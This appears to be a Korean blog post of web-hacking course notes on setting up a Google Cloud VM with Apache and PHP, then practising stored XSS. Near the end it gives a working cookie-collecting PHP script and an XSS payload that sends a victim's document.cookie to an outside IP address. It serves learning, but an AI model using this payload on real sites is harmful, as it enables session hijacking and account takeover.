(1) 해당 1부에서 구글 클라우드 VM 만들기를 아주 자세하게 따라할 수있다.
https://opencourse.tistory.com/591?category=354408
구글 클라우드 Google Cloud Platform(GCP) 프리티어 1부 - 평생 무료 서버(VM 인스턴스) 생성하기
코로나의 여파인지 안그래도 핫 하던 클라우드 시장이 꾸준히 성장하고 있습니다. 이번엔 마이크로소프트에서 윈도우 환경을 제공하는 윈도우 365 서비스에 사람들이 무척이나 몰려서 클라우드
opencourse.tistory.com
(2) 3부에 마지막에 있는 방화벽 설정을 따라한다.
https://opencourse.tistory.com/596?category=354408
구글 클라우드 Google Cloud Platform(GCP) 프리티어 3부 - Docker(도커)와 포테이너(Portainer) 설치하기
도커는 리눅스의 X컨테이너를 이용해 리눅스 안에 또 다른 격리된 환경을 만드는 기술입니다. 간단하게 이야기하자면 도커 컨테이너라는 단위로 한 리눅스 서버안에서 여러가지 리눅스 환경을
opencourse.tistory.com
(3) SSH부분을 실행시킨다.
[아파치 서버 설치]
$ sudo apt-get update
$ sudo apt-get install apache2[아파치 서버 실행]
$ sudo service apache2 start
기본 페이지가 뜨는 것을 확인한다.
[PHP 설치 연동]
$sudo apt install php php-mysql
#디렉토리 이동
cd /var/www/html
#파일 생성
(1) cat > file.php
(2) 내용 입력
<?php
phpinfo();
?>
(3)Ctrl + D 키 입력으로 종료
PHP기본 페이지 확인
[쿠키 탈취]
파일 참고 사이트: 함꼐 스터디하시는 분의 글에 도움을 많이 받았다.
https://hanuscrypto.tistory.com/83#comment6342979
Oracle Cloud : XSS(Cross-Site Scripting) 실습
Stored XSS 실습에서 로컬이 아닌 내 own 서버로 쿠키 탈취를 해보고 싶다는 일념 하나로 시작한 Oracle VM 생성기! Oracle 등록에서 실제 쿠키 탈취에 성공하기까지... "왜 안되지?ㅠㅠ"만 3일 동안 외친
hanuscrypto.tistory.com
cookie.php 빈cookie.txt 를 만들고 원하는 곳에 스크립트를 삽입한다.
# cookie.php
$cookie=$_GET[cookie];
$save_file=fopen("cookie.txt","a");
fwrite($save_file,$cookie);
fclose($save_file);
# script
<script>document.location="http://34.145.83.227/cookie.php?cookie="+document.cookie;</script>
쿠키 탈취에 성공했다.
'Web hacking > Nomaltic) 웹 해킹 수업 노트 👩💻' 카테고리의 다른 글
| [12주차] SSRF 개념 및 실습 (0) | 2022.02.03 |
|---|---|
| [12주차] JWT 개념 (0) | 2022.02.03 |
| [14주차] 금취분평 취약점, XXE 취약점 (0) | 2022.01.20 |
| [실습] 쿠폰 중복 적용 취약점 (0) | 2022.01.14 |
| [실습]유추 가능한 인증정보 이용 취약점 (0) | 2022.01.14 |
